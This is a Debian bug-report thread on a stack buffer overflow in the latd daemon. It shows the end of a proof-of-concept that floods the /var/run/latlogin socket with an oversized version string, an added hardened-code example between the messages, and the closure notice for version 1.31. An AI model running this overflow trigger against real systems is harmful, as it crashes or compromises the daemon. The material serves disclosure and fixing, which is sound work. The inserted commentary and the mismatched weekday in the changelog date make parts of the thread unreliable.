AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    strcpy(sockaddr.sun_path, "/var/run/latlogin");
    sockaddr.sun_family = AF_UNIX;

    if ( connect( s, (struct sockaddr *)&sockaddr, sizeof(sockaddr)) )
    {
        perror( "connect" );
        exit( -1 );
    }

    send_msg( s, 0x8, (char*) str, strlen( str ) );
    return 0;
}

--- End Message ---
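The report above pins the defect on an unbounded sprintf into a fixed 1024-byte stack buffer, fed by a version string the client controls over the /var/run/latlogin socket. The following is an added example, not latd's code and not the fix shipped in 1.31: it shows how the two inputs involved (the 3-byte LATCP header the PoC constructs, and the version string itself) can be bounded before any formatting happens. VERSION is given a stand-in value, and MAX_CMDBUF and MAX_VERSION_LEN are assumed limits chosen for the example; the function names are likewise hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define VERSION "1.31"         /* stand-in for latd's VERSION macro (assumed) */
#define MAX_CMDBUF 1024        /* assumed size of the daemon's receive buffer */
#define MAX_VERSION_LEN 32     /* assumed upper bound on a legitimate version */

/* Decode the 3-byte header the PoC's send_msg() writes: command byte,
 * then the body length as a big-endian 16-bit value.
 * Returns 0 and fills cmd/len when the body fits the receive buffer with
 * room for a terminating NUL, -1 otherwise (caller drops the connection). */
int latcp_parse_header(const unsigned char hdr[3], int *cmd, size_t *len)
{
    size_t l = ((size_t)hdr[1] << 8) | hdr[2];
    if (l >= MAX_CMDBUF)
        return -1;
    *cmd = hdr[0];
    *len = l;
    return 0;
}

/* Hardened LATCP_VERSION handling.
 * Returns 1 when the client version matches, 0 on mismatch (err holds a
 * bounded message), -1 when the version string is implausibly long and is
 * rejected before any formatting takes place. */
int latcp_check_version(const char *cmdbuf, size_t len, char *err, size_t errlen)
{
    /* strnlen bounds the scan: cmdbuf is not assumed to be NUL-terminated */
    size_t vlen = strnlen(cmdbuf, len);

    if (vlen > MAX_VERSION_LEN) {
        snprintf(err, errlen, "llogin version string too long (%zu bytes)", vlen);
        return -1;
    }
    if (vlen == strlen(VERSION) && memcmp(cmdbuf, VERSION, vlen) == 0)
        return 1;

    /* snprintf never writes past errlen; %.*s bounds how much of cmdbuf is read.
     * Contrast with the original: sprintf(error, "... %s ...", cmdbuf). */
    snprintf(err, errlen, "llogin version %.*s does not match latd version " VERSION,
             (int)vlen, cmdbuf);
    return 0;
}

int main(void)
{
    /* constructed inputs: a legitimate header, an oversized one, and a
     * long run of 'A' like the report's payload */
    unsigned char hdr_ok[3]  = {0x08, 0x00, 0x04};   /* cmd 8, len 4 */
    unsigned char hdr_big[3] = {0x08, 0x10, 0x00};   /* cmd 8, len 4096 */
    char err[128];
    char flood[2000];
    int cmd;
    size_t len;

    memset(flood, 'A', sizeof flood);

    printf("header ok:   %d\n", latcp_parse_header(hdr_ok, &cmd, &len));
    printf("header big:  %d\n", latcp_parse_header(hdr_big, &cmd, &len));
    printf("match:       %d\n", latcp_check_version("1.31", 4, err, sizeof err));
    printf("mismatch:    %d (%s)\n", latcp_check_version("1.30", 4, err, sizeof err), err);
    printf("flood:       %d (%s)\n", latcp_check_version(flood, sizeof flood, err, sizeof err), err);
    return 0;
}
```

Both checks are independent on purpose: the header check caps how much the daemon reads into its buffer, and the length check on the version string refuses garbage before it reaches the formatter, so even a caller that bypasses one of them cannot overrun the error buffer.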
--- Begin Message ---
Source: latd
Source-Version: 1.31

We believe that the bug you reported is fixed in the latest version of
latd, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 699...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christine Caulfield <christine.caulfi...@googlemail.com> (supplier of updated latd package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun,  6 Dec 2013 11:32:08 +0000
Source: latd
Binary: latd
Architecture: source i386
Version: 1.31
Distribution: unstable
Urgency: low
Maintainer: Christine Caulfield <chris...@debian.org>
Changed-By: Christine Caulfield <christine.caulfi...@googlemail.com>
Description: 
 latd       - LAT (Local Area Transport) Daemon
Closes: 699625
Changes: 
 latd (1.31) unstable; urgency=low
 .
   * Don't crash if we are fed a malicious version number.
     Closes: #699625
   * Fix some Lintian errors regarding LSB and build flags
Checksums-Sha1: 
 7905bb7a8752fee788a96a91ba53a78e3deff42c 739 latd_1.31.dsc
 ef493493341c2c9bfc3ec709107846c33c70825f 515171 latd_1.31.tar.gz
 8231ad1cbf5e2c1d3e364ee70610f73cd9c04e2b 92922 latd_1.31_i386.deb
Checksums-Sha256: 
 43861c390ad62fd4e91645e296b396d677b818de8656e0339991498e3f7e439d 739 latd_1.31.dsc
 6839a48d60ee52d51c1cf1a4303459d55ab6d256fdba1ac2f5478c50796deaa0 515171 latd_1.31.tar.gz
 94c7a68088bf8278967314320f9bae9eaff679c084f3707f9e6154bc0a17ffa6 92922 latd_1.31_i386.deb
Files: 
 2f562a15b75045415b08e6aef7e5c226 739 net extra latd_1.31.dsc
 d2d4caeca72d0e640ebbe3f63d90f42e 515171 net extra latd_1.31.tar.gz
 e09e7fc4b27d35aec417cccfcebfa563 92922 net extra latd_1.31_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlEPpFMACgkQhej7/PCycRNyaACfR0vU3OZ7oNx8dbr2npTKiB2x
e3sAmgKVnEoL6ItUnFfrqvn81OahDkTp
=UHdz
-----END PGP SIGNATURE-----

--- End Message ---
